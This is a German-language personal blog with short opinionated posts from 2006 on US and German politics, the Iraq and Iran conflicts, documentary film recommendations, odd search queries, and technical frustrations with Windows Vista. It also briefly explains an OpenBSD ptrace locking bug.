[l] Wer sich wundert, wieso die CIA ihre Bin Laden Abteilung zugemacht hat… hier ist eine mögliche Erklärung: CIA: Bin Laden hat Bush bei der Wiederwahl geholfen

Mon Jul 3 2006

[l] Auf Anfrage: bizarre Google-Anfragen, über die Leute hierher gefunden haben:
- fette tonnen ficken und wissen mit füssen
- nähen blog
- Otto Schily Preis für maximalen Realitätsabstand (yeah!)
- bsd bnd bundesregierung deutschland
- scheißende alte Frauen (?!?)
- schaufensterpuppen gema (oha, kennt da jemand mehr Verschwörungstheorien als ich?)
- Hartz 4 Judenstern (dito)
- java speed hack (sorry, da bist du bei mir falsch)
- unterirdische gänge wikipedia vatikan (WTF!?)
- inflateInit2 gzip 32 (andere finden das API offensichtlich auch unklar)
- porno de l'england (wenn man das bei google.fr sucht, kommt man tatsächlich hier raus!)
- Hersteller von Jubliäumstorten
- wm +tiergarten +pinkeln +video (…!?)
- +"Speed Hack" +edonkey
- schilling cdrecord gericht (Jörg hat offenbar Feinde)
- warum funktioniert torrentspy bei mir nicht (kann ich dir auch nicht sagen)
- sich in den fuß schießen delphi pascal php basic assembler (du bist auf dem richtigen Weg)
- ausländische Adelstitel kaufen (mein "von" ist unverkäuflich!)
- hilfe failed to render the file bei pornos (ich empfehle mplayer, der spielt bis auf DRM-Kack praktisch alles)
- nazi verarsche download (ROTFL)
- T-Systems Kriminelle Vereinigung (hahaha)
- ich brauch die fette kohle (wer tut das nicht)
- kann man die broadcast einfach ändern (nein)
- botnet positive aspekte (da kannste lange suchen)
- flughafenkontrolle dildo (also ich hatte ja schon Ärger am Flughafen, aber … aus anderen Gründen)
- blog without php (yeah!)
- prall aufgeblasen luftmatratze
- Kostet die Ausbildung zu einem Forensiker gelD? (ja)
- "wo bleibt eigentlich die Revolution" (das würde ich auch gerne mal wissen)
…und viele mehr. Ich bin ja immer wieder erstaunt, wie viele Leute hier landen, weil sie Google nach "blog" fragen.
[l] Filmtipp: The Road to Guantanamo (IMDB-Link, und in England gibt es das schon auf DVD). Ich bin darauf aufmerksam geworden, weil Michael Winterbottom der Regisseur ist, und von dem suche ich seit Code 46 alle Filme zusammen. Wer Code 46 nicht gesehen hat: das ist ein unglaublich guter Film, einer meiner Lieblingsfilme überhaupt. Richtig guter Sci-Fi, der einen nicht mit Special Effects überzeugt, sondern mit intelligenter Story, und wo man danach erst mal eine Nacht wachliegt und über die Geschichte nachdenkt. Aber zurück zu Road to Guantanamo… :-)
In dem Film geht es um ein paar Jugendliche aus England, alle mit Familie in Pakistan. die Mutter des einen schickt ihn zu einer Familienhochzeit nach Pakistan, und da soll er auch mal seine Wurzeln kennenlernen, und er nimmt ein paar Kumpels mit, die sich einen coolen Urlaub versprechen. Winterbottom hat Schauspieler angestellt, und ist mit ihnen zu den Originalschauplätzen gefahren, und so fühlt sich der Anfang erst wie ein Road Movie an, aber dann fahren die Kids nach Afghanistan. Eine Schnapsidee, aber die Leute in Pakistan halten es alle für ausgeschlossen, daß die Amis wirklich Afghanistan bombardieren, und so fahren sie da hin, in Bussen, unter abenteuerlichen Umständen. In Afghanistan beginnt dann die US-Bombardierung. Sie hatten initial noch die Idee, den Leuten da helfen zu wollen (also gar nicht mal militärisch, völlig jung und naiv dachten sie, vielleicht braucht da jemand unsere Hilfe), aber einer von ihnen wird krank, und so kommen sie nach der Reise von Kandahar nach Kabul nicht wirklich raus und entscheiden sich, zurück zu fahren. Der Bus nach Pakistan fährt sie aber in die Gegenrichtung, in die letzte Taliban-Gegend, wo sie prompt von den Amis bombardiert werden. Weiter habe ich selbst noch nicht gesehen, aber der Titel läßt ja ahnen, wie es weitergeht. Schon bis hier ist der Film so derartig mitreißend gemacht, das ich feuchte Hände kriege beim Gucken. Winterbottom stellt Szenen nach, aber blendet zwischendurch Fernsehnachrichten-Schnipsel ein, die damals in der Gegend gemacht wurden. Ich werde das mal weiter gucken, aber schon jetzt ist das ein ganz klarer Must-See. Die Geschichte ist dann später so verlaufen, daß die Jungs von den Amis eingesackt und nach Guantanamo geschickt wurden, wo sie zwei Jahre ohne Anklage verhört und inhaftiert waren, bevor sie am Ende frei kamen. Der Film beruht auf ihren Aussagen. In England kennt die Geschichte offenbar jeder, aber in Deutschland oder gar in den USA ist das völlig unbekannt. Daher, tut was für Völkerverständigung, und guckt euch den Film an. Sehr empfohlen. Der Film lief in England sogar schon im Fernsehen, insofern hoffe ich mal, daß das über legale Privatkopiewege seine Runde macht in Europa.

Sun Jul 2 2006

[l] Ich habe die Gelegenheit des US-Aufenthaltes genutzt, um mal ein paar Gespräche mit Leuten zu führen, und was den Leuten hier gerade auf der Seele lastet, ist gar nicht der Irakkrieg (die Einsicht, daß die Bush-Junta sie verarscht, hat offenbar breiten Rückhalt in der Gesellschaft, aber man begegnet dem mit "na die Demokraten sind auch nicht besser" und "was kann ich schon machen") sondern die Mexikaner.
Zumindest unter Techies ist das Wahlmaschinen-Problem weitgehend bekannt.
Die Debatte mit den mexikanischen Einwanderern läuft mit sehr ähnlichen Argumenten ab wie bei uns, aber es fühlt sich für mich viel klarer an, weil ich da als Außenstehender nicht emotional betroffen bin. Ich finde es sehr interessant, sich damit zu beschäftigen, weil man die Erkenntnisse am Ende vielleicht übertragen kann. Die vorgebrachten Argumente sind:
1. Die Mexikaner zahlen keine Steuern, aber wir zahlen dafür, daß ihre Kinder zur Schule gehen.
2. Wir sprechen hier Englisch, die Mexikaner wollen aber nicht Englisch lernen und jetzt müssen wir am Telefon immer "press 1 for Spanish" hören
3. Die ganzen illegalen Immigranten bringen Kriminalität zu uns
Was ich an der Mexiko-Frage aber am interessantesten finde: wie Bush damit umgeht. Denn er hat das Problem, daß der Binnenmarkt die hohe Überschuldung der Amis nur überlebt, weil die Güter und Dienstleistungen immer billiger werden, und die sind so billig, weil sie in Sweatshops hergestellt und von illegalen Einwanderern angeboten werden. Das Volk versteht das aber nicht und verlangt Maßnahmen gegen die Mexikaner. Bush befriedigt jetzt beide Seiten, indem er auf der einen Seite lauter sinnfreie Maßnahmen durchführt (Mauer bauen, Nationalgarde hinschicken, aber bei beiden bei der Durchführung grob verkackt), und auf der anderen Seite Mexikanern entgegen kommt, indem er ihnen Amnestie, Arbeitsvisa und Schulbildung anbietet. Bush mag zwar ein Depp sein, aber seine Berater sind zumindest in der Frage ziemlich geschickt.
Auch sehr interessant an Mexiko ist Vicente Fox, der Präsident, denn der hat bei Amtsantritt erst mal angefangen, seine Befugnisse und die der Regierung auf das in der Verfassung definierte Maß zurück zu fahren. Sowas würde ich mir ja auch bei uns mal wünschen. Der Mann scheint der einzige Demokrat zu sein, den die USA in fremden Ländern an der Macht halten. Normalerweise sind das ja eher krasse Diktatoren und fiese Tyrannen.
Im Übrigen, liebe Susanne, beantrage ich hiermit ein Howto, oder eine FAQ von mir aus, wo solche tumben Parolen mal aufgelistet und in einfachen Worten widerlegt werden. Ich halte es für an der Zeit, daß wir allen Leuten Argumente in die Hand geben, um aus solchen Stammtischparolen souverän die Luft rauslassen zu können. Ich gebe mal ein Beispiel, wie ich das meine:
"Die Mexikaner zahlen keine Steuern"
Erstens betrifft das nur die Einkommenssteuer; andere Steuern wie Mehrwertsteuer, Tabaksteuer, Benzinsteuer und so weiter zahlen die natürlich auch. Zweitens gibt es auch in den USA ein progressives Steuersystem, bei dem man erst ab einem Mindesteinkommen steuerpflichtig wird. Und das Einkommen der durchschnittlichen illegalen Einwandererfamilie ist deutlich unter dem Mindeseinkommen. Im Übrigen nutzen die Mexikaner ja auch die ganzen Dienstleistungen nicht, die US-Bürgern zur Verfügung stehen. diese Studie von 2004 sagt, daß bei einer Einbürgerung die Kosten pro Mexikaner für den Staat um knapp 200% oder $5000 steigen (die Seite will mit den Zahlen das Gegenteil ausdrücken, aber wenn die Mexikaner weg wären, müsste der Job ja von anderen gemacht werden, die dafür auch nicht mehr Geld bekämen, aber Bürger wären).
So oder so ähnlich wünsche ich mir eine Art Wikipedia der dummen Stammtischargumente und ihrer Widerlegung. Wer macht mit? Ich will jetzt nicht, daß wir alle über Mexikaner bloggen, sondern schon über unsere eigenen Probleme, aber der Blick auf vergleichbare Probleme anderer Leute hat noch keinem geschadet.

Fri Jun 30 2006

[l] Ausgerechnet die Briten wollen den Deutschen und Franzosen jetzt vormachen, wie ein ambitioniertes CO2-Emissionssenkungsziel aussieht. Sehr schön, hoffentlich ist das nicht nur ein Papiertiger. Ich vermute ja, daß denen mal jemand aufgemalt hat, wieviel von London übrig bleibt, wenn das Meer ein paar Meter steigt…

Mon Jun 26 2006

[l] Only in England: Frau geht zum Friseur, kommt zurück, hat jemand ihren Parkplatz zu einem Behindertenparkplatz umgemalt und ihr ein 60-Pfund-Knöllchen gegeben (Danke, Martin)
[l] OH MANN ist das schmerzhaft, Vista benchmarken zu wollen! Ich dachte, ich hacke da kurz ein tar zusammen, und portiere gatling, und fertig ist die Laube. Erst waren die Pipes kaputt, dann funktionierte der zlib-Code nicht, weil man unter Windows zwar fdopen auf einen Socket machen kann, aber fread und so gehen danach nicht. Also habe ich einen Test-Code gehackt, der einen TCP-Socket öffnen, connect() aufruft, dann einen HTTP-Request mit write() schreibt… geht nicht. Na gut, dachte ich mir, ist vielleicht write kaputt, nehme ich halt WriteFile. Geht auch nicht. EINVAL. send geht aber. send! Laut MSDN hätte WriteFile funktionieren müssen, insbesondere klappt ja in dem Webserver, den ich für Windows gehackt habe, ReadFile. Bizarro.
Na egal, habe ich halt ein anderes zlib-Interface ("inflate") benutzt, um damit die hereinkommenden Daten, die ich per recv lese, zu unzippen, und was soll ich euch sagen — Z_DATA_ERROR. Weil zlib ein anderes Format als gzip benutzt, und man muss inflate sagen, daß man einen gzip-Header erwartet, indem man inflateInit2 benutzt statt inflateInit, und dann bei dem Parameter, der die Anzahl der Bits im Compression Window, 32 dazu addiert. Das teilt dann inflate mit, daß auch ein gzip-Header OK ist.
Aber hey, ich habe da jetzt schon so viel Zeit rein versenkt, diesen Benchmark unter Windows zum Laufen zu bringen, ich lasse mich jetzt nicht von zlib abhalten!! Also habe ich das gemacht, und immerhin den 1. Teil durchgeführt, das Auspacken des Tarballs. Vorher den Durchsatz mal verdreifacht, indem ich den Antivirus, Windows Defender und den Search Service abgeschossen habe; soll die Nachwelt entscheiden, ob ich das tun mußte, weil das sonst unfair gewesen wäre, oder ob ich das hätte drinlassen sollen. Man könnte ja auch argumentieren, daß Microsoft einem diesen Scheiß per Default ausliefert, also ist das nicht meine Schuld, wenn ich das nicht ausmache. Ich habe ja auch unter Unix den sshd nicht abgeschossen. Anyway, ich habe also endlich die Dateien auf die Platte gehauen, und meinen gehackten Webserver gestartet, und … ich kriege bizarrste Fehlermeldungen. Ich benutze da u.a. overlapped I/O, d.h. ich haue Requests raus, und queue die mit einem Zeiger auf eine State-Struktur an einem Completion Port, so funktioniert deren API. Dann kriege ich mitgeteilt, da ist ein Vorgang fertig, und hier ist der State dazu. Und an der Stelle wird einem dann auch gesagt, wie viele Bytes man denn nun tatsächlich gelesen hat. Und was soll ich euch sagen, ich queue da Reads für 8k (mehr Header erwarte ich nicht, die tatsächlichen Header sind eher so 150 Bytes), und der Completion Port sagt mir dann, "ich habe die 83k gelesen, die du haben wolltest". WTF?! Nicht nur das, ich kriege auch den Effekt, daß ein Read, den ich rausschicke, nicht mit "OK, ich melde mich dann später" antwortet, sondern sofort fertig wird. Laut API-Beschreibung kann das nicht passieren. Tja, und dann segfaultet der Serverprozeß plötzlich. Reproduzierbar. Oh, nicht in meinem Code, in NTDLL. Grunz!! Ich vermute ja, daß da deren State Machine durcheinander kommt und mir einen Block zweimal zurück gibt, und daher ein Double Free passiert oder so. Aber im Moment ist das völlig unklar alles.

Tue Jun 20 2006

[l] Bug der Woche (von Ilja gefunden, der Mann hat echt zu viel Zeit), und zwar in der ptrace-Implementation von OpenBSD:
```
  CASE PT_SETREGS:
[…]
  error = copyin(SCARG(uap, addr), regs, sizeof(*regs));
  if (error == 0) {
    PHOLD(p);
    error = process_write_regs(t,regs);
    PRELE(p);
```
OpenBSD lockt den falschen Prozeß, p. Sie sollten t locken, und zwar bevor sie copyin machen (das kann blocken, und in der Zeit kann der getracete Prozeß enden und so viele neue gestartet werden, daß einer von ihnen seine struct an der richtigen Stelle hat), und dann schreibt dieser Code die Register in den falschen Prozeß rein. Ich vermute mal, daß das im Moment noch nichts ausmacht, weil OpenBSD ein Kernel-Locking-Modell aus den 70ies hat, wo es nur einen großen Kernel Lock gibt. Man kann also sagen, daß ihre beschissene Performance tatsächlich Sicherheitshintergründe hat!!
Ilja ist der Meinung, daß während copyin Paging auslöst auch andere Syscalls gemacht werden können. Ich glaube das, wenn ich es sehe. Welchen Sinn hätte ein großer Kernel Lock dann. Na mal gucken, wir werden das klären.

Fri Jun 16 2006

[l] Irak präsentiert Dokumente, daß Al Kaida die USA in einen Krieg mit dem Iran ziehen will. Zur Bewertung dieser Meldung muss man wissen, daß im Irak 97% der Einwohner Moslems sind, und von denen sind 60-65% Schiiten, 32-35% Sunniten. Bisher haben die Sunniten geführt, aber das hat sich mit Saddams Sturz umgekehrt. Das religiöse Zentrum der Schiiten ist der Iran, dort sind die heiligen Stätten und die Religionsführer. Wir haben es hier also mit einer PSYOP der Schiiten zu tun, um den Iran-Krieg der Amis zu torpedieren. Sehr gut gemacht, liebe Iraker! :-)

Thu Jun 15 2006

[l] SPD will Kirchensteuer von AGs und GmbHs erheben. Unfaßbar. "Bitte wählt uns NIE wieder!1!!" Keine Sorge, das kann ich schon deshalb nicht, weil ihr Schily zum Innenminister und die Schmidt zur Gesundheitsministerin gemacht habt. Und weil ihr die Zypries nicht gestoppt habt. (Danke, Rene)

Fri Jun 9 2006

[l] Al Sarkawi wurde von zwei 500-Pfund-Bomben getötet. Dabei haben sie zwar ein ganzes Haus demoliert und sieben Menschen ermordet (wo ist eigentlich der Unterschied zwischen einer Autobombe im Irak und so einem Serienmord?), aber hey, das waren alles Terroristen, inklusive des Kindes!1!!
Interessanterweise schreibt Stratfor dazu folgendes:
Following the announcement of the death of al Qaeda in Iraq leader Abu Musab al- Zarqawi in a targeted U.S. airstrike, Iraqi Prime Minister Nouri al-Maliki announced that the three vacant security positions in the Iraqi Cabinet have been filled and approved by the Parliament. By providing precise intelligence on al-Zarqawi's location, it appears that Iraq's Sunni political leadership has demonstrated the willingness to deliver on a U.S.-brokered deal to solidify the political arrangement in Iraq.
Kurz gesagt: da hat jemand nen Deal gemacht. Man könnte das auch so lesen, daß jetzt Al Kaida-Insider im Irak die Security machen, aber so zynisch bin ich ja nicht.

Mon Jun 5 2006

[l] Wir sind ja hier ein Verschwörungsblog, daher mal folgender Gedankengang. Also wenn ich ein Polizist in Schweden wäre, der sich vermutlich privat seine Doctor Who Folgen auch bloß vom Pirate Bay geholt hat, und wir haben seit Jahren nichts gegen die unternommen, weil das legal ist, was die da tun, und jetzt kommen die Amis, und drücken über das Außenministerium (das ist eh der Feind des Innenministeriums, denen die Polizei unterstellt sind) durch, daß ich bei denen eine Razzia machen soll, und obwohl wir denen gesagt haben, daß wir das für legal und die Razzia damit für illegal halten, werden wir dazu gezwungen… ich würde genau das tun, was die da jetzt gemacht haben: so tief wie möglich bei der Razzia ins Klo greifen. Am besten versehentlich noch die USV kaputt machen, Hardware von Unbeteiligten runterfallen lassen, was halt so passiert. So viel kaputt machen wie möglich. Am Ende die Eichmann Verteidigung bringen, und mit dem Finger auf den Justizminister und das Außenministerium zeigen, und beim Bierchen zusehen, wie die vor Gericht brennend untergehen. Oder? Ich glaube ja immer wieder gerne an Unfähigkeit, insbesondere bei Strafverfolgungsbehörden, aber so kraß wie das bei den Schweden daneben gegangen ist, das ist jenseits von "Oops", wenn ihr mich fragt. Was meint ihr?

Sat Jun 3 2006

[l] Filmtipp: Fog of War. Ein Interview mit Robert McNamara. Der Mann war unter Kennedy und Johnson Verteidigungsminister der USA, er war auch mal Präsident von Ford, und sogar Präsident der Weltbank. Er war zuständig für die Kubakrise, und hat im 2. Weltkrieg geholfen, Japans Größstädte mit Brandbomben dem Erdboden gleich zu machen. Im Vietnamkrieg war er der Eichmann der Amis, und hat statistische Metriken angelegt, hat ausgerechnet, wie viele Vietkong und wie viele US-Soldaten es da gibt, und hat dann empfohlen, man müsse die einfach solange bekämpfen, bis alle tot sind. Kurz gesagt: nicht viele Menschen haben so viel Blut an ihren Händen wie er.
Eroll Morris wollte eigentlich einen Film über Vietnam machen, und hatte ein 20 Minuten Segment mit McNamara geplant, aber als der losredete, war das so spannend, und er wollte gar nicht mehr aufhören, daß Morris stattdessen einen Film über McNamara daraus gemacht hat. Und ein Glück, denn dieser Film ist atemberaubend gut. McNamara war beim Drehen 85 Jahre alt, und das ist so eine Art Lebensbeichte. Er äußert sich zu Vietnam, und geht auch immer wieder darauf ein, wie er das alles moralisch vor sich rechtfertigt. Und das ist, was diesen Fiml so einzigartig macht. McNamara bricht an einer Stelle im Film fast in Tränen aus, und zwar als er beschreibt, wie die Amis die Bomber über Tokio umfunktioniert haben, so daß die aus der halben Höhe bombten, dadurch viel genauer trafen, aber einer der US-Piloten starb. In der einen Nacht haben sie 100000 Japaner getötet, Zivilisten, Frauen und Kinder, in ihrem Schlaf. Denen weint McNamara keine Träne nach. Aber der eine Pilot, der bringt ihn außer Fassung.
Viele der Sachen tut er ab, indem er davon spricht, daß Menschen eben Fehler machen, und er habe halt seinen Anteil an Fehlern gemacht. Und er fängt auch richtig zu rechtfertigen an, aber halt in die andere Richtung. Den einen toten Piloten, das müsse man schon hinnehmen im Krieg, wenn man die Japaner nicht abgeschlachtet hätte, dann hätte man eine Invasion machen müssen, und dabei wären womöglich US-Soldaten gestorben. Dieser Film ist (wie viele meiner Empfehlungen) sehr harter Tobak, und man muss sich Zeit dafür nehmen. Dafür wird einen dieser Film über Jahre begleiten. Sehr eindrucksvoll auch seine Ausführungen zur Kubakrise. Fidel Castro hat ihm später erzählt, daß da nicht nur Raketen auf Kuba waren, sondern auch 162 Atomsprengköpfe, und daß er, Fidel, damals Chruschtschow aufgefordert habe, diese Atomraketen auf die Amis abzufeuern, obwohl klar ist, daß Kuba dabei komplett zerstört würde. Eine Schlüsselszene in dem Film ist, wie McNamara gerade am erzählen ist, und da wirft Morris aus dem Off ein, die USA hätten ja auch gerade eine Invasion versucht, woraufhin McNamara leicht aus dem Konzept gerät, und auspackt, daß es mehrere Attentatsversuche auf Castro gegeben hatte.
Sie haben an dem einen Schlüsseltag dann zwei Meldungen von Chruschtschow gekriegt. Die eine war von einem "betrunkenen oder sehr stark unter Streß stehendem Mann" und war eher versöhnlich, die andere von Hardlinern, die auf Konfrontation gingen. Das war alles so eine Haaresbreite damals, da will man gar nicht tief drüber nachdenken müssen.
Anderes Detail, wo ich froh war, daß das mal jemand anspricht: bei dem Atomwaffensperrvertrag mit den Russen war der Hintergrund, daß die Amis zu dem Zeitpunkt viel mehr Atombomben als die Russen hatten, und sie hatten 10 Mal so viele Atomtests gemacht, und die Amis fühlten sich daher deutlich überlegen, und wollten den Status Quo so festschreiben. Er zitiert dann lustigerweise einen Hardliner, der den Vertrag mit der Begründung ablehnte, die Russen würden dann bescheißen, indem sie ihre Tests auf der dunklen Seite des Mondes durchführen würden! Unfaßbar, wie die Leute damals drauf waren! Naja, was soll ich sagen. Guckt euch den Film an. Macht es am besten an einem Freitag abend oder Samstag, damit ihr das am nächsten Tag verarbeiten könnt, was ihr da gesehen habt.

Wed May 31 2006

[l] Keine Situation ist so beschissen, daß sie von der CDU nicht noch schlimmer gemacht werden könnte: CDU-Fraktionschef Kauder will jetzt Arbeitslose (auch erwerbslose Manager) zu Arbeiten wie Spargelstechen zwingen, damit sie nicht "sinnlos rumgammeln". Von sich selbst, findet Kauder, könnte man z.B. erwarten, daß er abends in einer Kneipe bediene. Damit das auch geschieht, müssen die Sanktionen konsequenter umgesetzt werden.
Mir gefällt der Gedankengang. Wir sollten ihn aber zu Ende denken, und auch von Politikern fordern, daß sie für ihr Geld arbeiten. Da das ja offensichtlich unqualfiizierte Arbeit ist, sollte pro Geld genau so viel Zeit pro Person verlangt werden wie sich aus dem Hochrechnen von Hartz IV ergibt. Das wären dann so 500 Stunden Wochen, oder?
[l] Filmempfehlung: "Life and Debt". Ein schockierender Film darüber, wie WTO, IMF und Weltbank Jamaica kaputt gemacht haben. Warnung: der Film macht wirklich schlechte Laune. Ich habe das bei Netflix geordert, aber das kann man bestimmt auch in Deutschland in Videotheken oder gut sortierten Bibliotheken kriegen.
Der Film beschreibt im Detail, wie Jamaica nach der Unabhängigkeit Geld brauchte, wie die Weltbank ihnen dann strukturelle Hilfe verweigert hat, ihnen aber einen kurzfristigen Kredit gegeben hat, mit marktüblichen Zinsen natürlich, und ihnen als Auflage gegeben hat, daß sie ihren Markt öffnen sollen, und daß sie Subventionen und Zölle abbauen müssen. Das läuft dann in mehreren Iterationen in einen selbstverstärkenden Kreislauf hinein. Und Jamaica darf noch nicht mal selbst entscheiden, wofür sie das Geld ausgeben, und wo sie sparen wollen. Das sagt auch die Weltbank. Gesundheitssystem und Bildung fallen als erstes komplett weg, und der Abbau der Subventionen und Zölle heißt, daß die lokale Milchindustrie nicht mit der zu über 50% subventionierten und viel automatisierter hergestellten US-Milch konkurrieren kann und pleite macht. Also kommen auch keine Steuern mehr rein, und der Staat muss mehr Kredite aufnehmen, um die alten zurück zu zahlen. Die neuen Kredite haben mehr und schärfere Auflagen.
Wie viele Kolonien hatte Jamaica einen Sonderstatus bei der EU bei Bananen, und den hat ihnen Chiquita über die US-Regierung weggeklagt (obwohl die USA gar nicht selber Bananen anbauen). Chiquita und Dole sind US-Firmen, obwohl das ganze Obst aus kolonialähnlichen Abhängigkeitsverhältnissen aus Drittländern kommt, wo die Arbeiter (der Film zeigt das am Beispiel Honduras) unter Sweatshop-Sklavenbedingungen für Billigstlöhne arbeiten müssen. Es gab da mal einen Aufstand in Honduras, der dann vom Staat brutal niedergeschlagen wurde (vermutlich auch als IMF-Folge?). Damit kann Jamaica nicht konkurrieren, weil die Gehälter zahlen wollen, von denen die Arbeiter leben können.
Die nächste Iteration in der Armutsspirale ist, daß die jetzt extraterritoriale Sweatshops aufgebaut haben bei Kingston, die Free Zones. Dort lassen US-Firmen wie Hanes dann Kleidung nähen, wobei alle Teile aus den USA kommen, nur das Nähen findet dort statt, aber weil das extraterritorial ist, zahlen die keine Steuern und können auch gar keine Zölle oder so erheben, weil formaljuristisch die Waren nie das Hoheitsgebiet Jamaicas erreichen. Oh, und wer hat die Gebäude und die Mauern gezahlt? Jamaica. Mit Mitteln (d.h. einem Wucherkredit) des Kartells aus Weltbank, IMF und Interamerican Development Bank. Überlegt mal, wie sehr eine Regierung mit dem Rücken zur Wand stehen muss, damit sie sich auf so einen Deal einläßt.
Sie sagen das in dem Film nicht, aber ich frage mich, wer da den Transport der Güter bezahlt. Auch Jamaica? Oder vielleicht ist das "Entwicklungshilfe", die in den USA als humanitärer Akt verkauft wird. Die Arbeiter kriegen umgerechnet 30 Dollar Lohn, alle zwei Wochen. Brutto. Brutto? Ich sagte doch, daß das extraterritorial ist und die keine Steuern zahlen! Stimmt. Wird den Arbeitern trotzdem abgezogen von den Sweatshop-Firmen. Mindeslöhne, Arbeitssicherheitsgesetze, Hygienegesetze, gilt da alles nicht.
Naja, dann sollen die halt rebellieren! Haben sie. Daraufhin haben die Firmen Hunderte von Asiatinnen eingeschifft, die dann da die Arbeit gemacht haben, und haben ein-zwei Fabriken zugemacht und nach China verschoben.
Und wißt ihr, wer Chef des IMF war, als das geschah? Der in dem Film auch prima Soundbites zum Thema "Wir müssen den Armen helfen" abgibt? 100 Punkte, wenn ihr Köhler gesagt habt. Ja, genau, der Köhler, der bei uns jetzt als Bundespräsident genau so verlogene Soundbites abgibt.

Sat May 27 2006

[l] Das Pentagon soll einen Waffendeal über 400 Mio $ für Munition mit den Russen gemacht haben, damit die Army in Afghanistan noch Munition hat, sollte ein Demokrat Präsident werden. Und es geht auch gar nicht um die US Army, denn die würde man wohl inklusive Munition abziehen dann, sondern es geht um die Afghanische Armee. Man kann die ja nicht unbewaffnet lassen, die müssen sich ja gegen die Nachbarländer wehren!1!! Oh, nein, nicht gegen die Nachbarländer, eher gegen die Taliban, die offenbar deutlich mehr als die Hälfte des Landes kontrollieren.
Nun könnte man sich fragen, wieso denn die Munition von den Russen kommen soll, und nicht von den Amis selber oder von den Israelis (auch groß im Waffengeschäft). Und überhaupt, was scheren die Amis der Taliban, sie haben doch mit dem Irak und Iran alle Hände voll. Und jetzt haltet euch mal fest, was da für eine großartige Verschwörungstheorie vom Telegraph kommt:
Diplomatic sources also believe that the US may be offering the estimated $400 million (£215 million) deal, including transport costs, to the Russians as an inducement to embargo its arms and nuclear technology exports to Iran.
Defence specialists said Russian arms chiefs at first "fell about laughing" because they thought the order was a joke when it arrived this month.

Thu May 25 2006

[l] Und hier ist die unglaublichste Meldung des Tages: Tom Delays Legal Defense Fund verweist allen ernstes auf ein Videoschnipsel vom Colbert Report, wo Stephen Colbert Robert Greenwald interviewt hat. Robert hat vorher Filme wie "Outfoxed" und "Wal-Mart: The High Cost of Low Price" gemacht. Sein aktueller Film ist über Tom Delay, und man kann sich ja vorstellen, daß das keine Lobeshymne ist. Colbert hat ihn interviewt, und ihm Fragen gestellt wie "Who hates America more, you or Michael Moore?", und das Video davon verlinken die da ernsthaft auf dem Tom Delay Defense Fund als Beleg dafür, wie Greenwald unter harten Fragen zusammenbricht. (via Boingboing) (Danke, Jan)
[l] Also ich würde ja NIE was schlechtes über Apple sagen, insofern verstehe ich auch gar nicht, wieso mir die Leute ständig so viele fiese Links zu Apple schicken. Wir haben ja schon gesehen, daß Apple die Belüftungsschlitze aus optischen Gründen zugemacht hat, aber seit ein paar Tagen geistert auch diese Geschichte durch die Nachrichten, daß Apple bei ihren Macbooks derartig viel Wärmeleitpaste auftragen, daß die Hitze nur noch partiell beim Heat Spreader ankommt, der sie dann abführen sollte, und so takten sich die Prozessoren dann selber runter, um dem Hitzetod zu entgehen. Die letzten beiden Bilder sollen aus dem Apple Service Manual sein (OMFG!!!), aber das kann ich ja nicht glauben. So dämlich ist selbst Apple nicht.
[l] Tja, so ist das, wenn man sich auf anderer Leute Infrastruktur verläßt. Insbesondere wenn das Bekannte sind statt schlichten Geschäftsbeziehungen. Susannes Blog ist futsch, ~~die Daten auch~~, und daher hat sie jetzt ein neues aufgemacht. Ich wünsche gutes Gelingen!
Update: Die Daten sind nicht weg. Hurra!!

Wed May 24 2006

[l] Oha, Propaganda-GAU für die Amis. Der Iran, mit dem man ja nicht reden kann, weil das alles verbohrte Mullahs sind, bietet den Amis nicht nur Gespräche an, die eigene Presse berichtet auch noch drüber! Was tun, sprach Zeus? Es gibt da mehrere Varianten. Beim ersten Golfkrieg hat man das so gemacht, daß man Saddam das Gefühl gegeben hat, weitere Gespräche seien nicht nötig, das Problem sei aus der Welt (Saddam hatte damals die US-Botschaft gefragt, ob das OK ist, wenn sie Kuweit annektieren, und die Amis haben geantwortet, sie würden das als eine inner-irakische Angelegenheit betrachten und sich da raushalten). Wenn das nicht geht, dann stellt man einfach Bedingungen, auf die die andere Seite unmöglich eingehen kann. Nur, wenn man das bei den Verhandlungen macht, riskiert man, daß die Presse das wahrheitsgemäß berichtet, also fahren die Amis dieses Mal die Variante, daß sie mit dem Iran gar nicht erst sprechen wollen, außer er hört mit der Urananreicherung auf. Das kann der Iran natürlich nicht tun, denn aus ihrer Sicht ist der Besitz von Nuklearwaffen die einzige Möglichkeit, einen Angriffskrieg der Amis tatsächlich zu verhindern (siehe Nordkorea).
[l] Ich habe mir vor ner Weile mal Gedanken gemacht, ob man Gattungsbegriffe aus der Kunstgeschichte nicht auch für Code-Klassifizierung einsetzen kann. Seht selbst
[l] Oi, in der Schweiz gibt es gerade einen fetten Geheimdienstskandal, und keiner kriegt's mit: Claude Covassi ist für den Schweizer Inlandsgeheimdienst zum Islam konvertiert, und sollte dann einem Moscheeleiter Dreck in die Schuhe schieben, hat unterwegs wohl auch einen Anschlag gegen eine El-Al Maschine verhindert, aber hat dann hingeworfen und sich der Schweizer "Bild", dem "Blick" offenbart. Die haben daraus eine Artikelserie gemacht und inzwischen soll sich sogar der Mossad für den Mann interessieren. (Danke, Chico)

Thu May 11 2006

[l] Ich habe mich ja schon amüsiert, als Paypal Mails rausschickte, die wie Phishing aussahen. Aber jetzt haben sie das noch mal getoppt. Wer jetzt bei Paypal (USA zumindest) einen Account anlegt, und ein Bankkonto dazu fügt, den fragt Paypal nach dem Usernamen und dem Passwort — BEI DER BANK. Und nicht nur das — Paypals Terms of Service sagen, daß man ihnen und Yodlee (!?!) erlaubt, für einen Sachen zu tun — und allen, denen Paypal oder Yodlee das Recht weiterreichen möchte. WTF!?!? Unfaßbar! Ein Zyniker könnte jetzt auf die Idee kommen, das als Phishing als Business Model zu bezeichnen… Danke an Chris Paget, der das herausgefunden hat und die Screenshots gemacht hat.
[l] Pop! goes the weasle. Und die Housing Bubble ist auch gleich mal geplatzt. Das ist ein Desaster sondergleichen für die USA, weil die Leute alle immens verschuldet sind, und das hier über Hypotheken gemacht wird. Wenn jetzt die Häuser weniger wert sind, dann sinkt auch die Höhe der darauf aufnehmbaren Hypothek, bzw. Zinssatz und Tilgung steigen. Das wird vielen Leuten die Existenz kaputt machen. Und ohne soziales Netz werden die Leute dann auf der Straße sitzen. Bush wird sich etwas ausdenken müssen, um denen die Wahlberechtigung wegzunehmen, sonst werden sie das mit den Wahlmaschinen nicht mehr wegmanipuliert kriegen.

Mon May 8 2006

